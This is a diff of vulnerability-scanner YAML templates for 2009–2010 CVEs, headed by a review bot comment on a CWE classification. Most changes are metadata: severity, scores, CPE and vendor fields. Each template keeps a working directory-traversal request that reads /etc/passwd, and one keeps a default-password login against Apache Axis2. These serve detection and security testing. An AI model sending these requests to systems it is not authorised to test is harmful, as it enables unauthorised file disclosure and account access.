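Review bot: In CVE-2009-5020 the classification changes `cwe-id: CWE-601` to `cwe-id: CWE-20` while the template still requests `awredir.pl?url=interact.sh` and keeps the `redirect` tag; CWE-601 (URL redirection to an untrusted site) describes what the matcher actually checks, whereas CWE-20 is the generic improper-input-validation class. The new value probably mirrors NVD's mapping, but it drops the information that makes the template useful for triage by weakness. Consider keeping `cwe-id: CWE-601` if the field is meant to describe the tested weakness rather than to track NVD verbatim.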
@@ -3,7 +3,7 @@ id: CVE-2009-5114 info: name: WebGlimpse 2.18.7 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. reference: - https://www.exploit-db.com/exploits/36994 @@ -13,22 +13,28 @@ info: remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 - cvss-score: 5.0 - tags: edb,cve,cve2009,lfi + epss-score: 0.03309 + cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: iwork + product: webglimpse + tags: edb,cve,cve2009,lfi http: - method: GET path: - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 1edfaf4565..3a946db7fa 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-0157 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00826 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla\! + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 
diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 0314758766..ae453080bf 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -3,21 +3,26 @@ id: CVE-2010-0219 info: name: Apache Axis2 Default Login author: pikpikcu - severity: high + severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - http://www.rapid7.com/security-center/advisories/R7-0037.jsp - http://www.vupen.com/english/advisories/2010/2673 + - http://retrogod.altervista.org/9sg_ca_d2d.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2010-0219 cwe-id: CWE-255 + epss-score: 0.97497 + cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.html:"Apache Axis" + vendor: apache + product: axis2 tags: cve,cve2010,axis,apache,default-login,axis2 http: @@ -28,7 +33,6 @@ http: Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} - - | POST /axis2/axis2-admin/login HTTP/1.1 Host: {{Hostname}} @@ -45,7 +49,6 @@ http: matchers-condition: and matchers: - - type: word words: - "

Welcome to Axis2 Web Admin Module !!

" diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index fed288fa12..ef613e1a62 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -8,8 +8,9 @@ info: reference: - https://www.exploit-db.com/exploits/11282 - https://nvd.nist.gov/vuln/detail/CVE-2010-0467 - - http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/ - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html + - http://www.exploit-db.com/exploits/11277 + - http://www.exploit-db.com/exploits/11282 remediation: Apply all relevant security patches and upgrades. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N @@ -17,19 +18,24 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - tags: cve,cve2010,joomla,lfi,edb + cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chillcreations + product: com_ccnewsletter + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 8c5952373a..87dc67e493 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-0696 info: name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/11447 - https://nvd.nist.gov/vuln/detail/CVE-2010-0696 - - http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/ - http://www.joomlaworks.gr/content/view/77/34/ + - http://www.exploit-db.com/exploits/11447 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0696 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.79015 + cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlaworks + product: jw_allvideos + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index e9add73331..68d8a5149c 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml 
@@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/11498 - https://nvd.nist.gov/vuln/detail/CVE-2010-0759 - - http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/ - - http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/ + - http://www.exploit-db.com/exploits/11498 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56380 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0759 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,plugin,edb + epss-score: 0.01326 + cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: greatjoomla + product: scriptegrator_plugin + tags: cve,cve2010,joomla,lfi,plugin,edb http: - method: GET path: - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index ca34393aa0..3ae5c45be1 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml 
@@ -3,31 +3,38 @@ id: CVE-2010-0942 info: name: Joomla! Component com_jvideodirect - Directory Traversal author: daffainfo - severity: high + severity: medium description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11089 - https://nvd.nist.gov/vuln/detail/CVE-2010-0942 - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55513 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0942 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jvideodirect + product: com_jvideodirect + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 8f1e936be0..deed2da1ad 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml 
@@ -3,31 +3,36 @@ id: CVE-2010-0943 info: name: Joomla! Component com_jashowcase - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. reference: - https://www.exploit-db.com/exploits/11090 - https://nvd.nist.gov/vuln/detail/CVE-2010-0943 - - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/ - - http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55512 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0943 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01155 + cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlart + product: com_jashowcase + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 29613823cd..b021b60f4d 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml 
@@ -3,32 +3,39 @@ id: CVE-2010-0944 info: name: Joomla! Component com_jcollection - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11088 - https://nvd.nist.gov/vuln/detail/CVE-2010-0944 - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - http://www.exploit-db.com/exploits/11088 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55514 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-0944 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thorsten_riess + product: com_jcollection + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 6dfbfe6681..e984dbb1c8 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml 
@@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/11738 - https://nvd.nist.gov/vuln/detail/CVE-2010-0972 - - http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/ - http://www.exploit-db.com/exploits/11738 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56863 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0972 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00813 + cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: g4j.laoneo + product: com_gcalendar + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 26bfe08e34..5924a8783f 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -3,7 +3,7 @@ id: CVE-2010-0982 info: name: Joomla! Component com_cartweberp - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10942 
@@ -16,19 +16,25 @@ info: cvss-score: 4.3 cve-id: CVE-2010-0982 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0087 + cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_cartweberp + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index ddcb6ae8fb..28ef19e752 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/10948 - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560 - http://www.exploit-db.com/exploits/10948 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0985 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01222 + cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chris_simon + product: com_abbrev + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 7384ca7f75..170dbc29c1 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1056 info: name: Joomla! Component com_rokdownloads - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11760 - https://nvd.nist.gov/vuln/detail/CVE-2010-1056 - - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/ - - http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/ + - http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56898 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1056 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.06484 + cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rockettheme + product: com_rokdownloads + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index f1038daacf..527b35c0d2 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml 
@@ -3,7 +3,7 @@ id: CVE-2010-1081 info: name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11511 @@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.02282 + cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: corejoomla + product: com_communitypolls + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 6bb0cf798e..b7833be0f6 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1217 info: name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. reference: - https://www.exploit-db.com/exploits/11814 - https://nvd.nist.gov/vuln/detail/CVE-2010-1217 - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866 + - http://www.exploit-db.com/exploits/11814 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1217 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin + epss-score: 0.01155 + cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: je_form_creator + product: je_form_creator + tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 36ddeade8d..78bef0b5cb 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml 
@@ -3,32 +3,37 @@ id: CVE-2010-1219 info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11757 - https://nvd.nist.gov/vuln/detail/CVE-2010-1219 - - http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952 - - http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56901 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1219 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00813 + cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: com_janews + product: com_janews + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 90bca826ff..fdac5d99dc 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1302 info: name: Joomla! Component DW Graph - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11978 
@@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1302 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi,graph + epss-score: 0.01204 + cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: decryptweb + product: com_dwgraphs + tags: edb,cve,cve2010,joomla,lfi,graph http: - method: GET path: - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 66c0e78c2c..64a95367bf 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1304 info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11998 - https://nvd.nist.gov/vuln/detail/CVE-2010-1304 - - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174 - http://www.exploit-db.com/exploits/11998 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1304 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,status,edb,cve + epss-score: 0.0045 + cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_userstatus + tags: cve2010,joomla,lfi,status,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 21afe4c34e..425d3d289c 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml 
@@ -3,32 +3,39 @@ id: CVE-2010-1305 info: name: Joomla! Component JInventory 1.23.02 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12065 - https://nvd.nist.gov/vuln/detail/CVE-2010-1305 - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 - - http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/ + - http://www.vupen.com/english/advisories/2010/0811 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57538 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1305 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.03203 + cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_jinventory + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 56ad8ebd10..011e567332 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml 
@@ -8,27 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12058 - https://nvd.nist.gov/vuln/detail/CVE-2010-1306 - - http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/ - - http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57508 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1306 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: roberto_aloi + product: com_joomlapicasa2 + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 065517053d..c080141c9e 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1307 info: name: Joomla! Component Magic Updater - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12070 - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - - http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/ - http://www.vupen.com/english/advisories/2010/0806 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1307 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.01751 + cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: software.realtyna + product: com_joomlaupdater + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index f31726b3bb..2b15bb83e4 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1308 info: name: 